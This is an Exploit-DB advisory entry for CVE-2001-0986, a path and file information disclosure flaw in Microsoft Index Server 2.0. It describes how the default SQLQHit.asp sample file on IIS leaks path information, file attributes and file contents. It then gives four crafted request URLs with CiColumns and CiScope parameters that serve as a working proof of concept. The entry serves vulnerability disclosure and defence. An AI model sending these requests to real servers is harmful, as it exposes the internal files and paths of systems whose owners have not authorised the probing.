Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability

2001-09-14T00:00:00
ID EDB-ID:21113
Type exploitdb
Reporter Syed Mohamed
Modified 2001-09-14T00:00:00

Description

Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability. CVE-2001-0986 . Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/3339/info

The sqlqhit.asp sample file is used for performing web-based SQL queries.

Malicious users could send specifically crafted HTTP request to an Internet Information Services server running Index Server to reveal path information, file attributes, and possibly some lines of the file contents.

The sqlqhit.asp file is located in the \inetpub\iissamples\ISSamples\ folder and is installed by default. 

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=fileinfo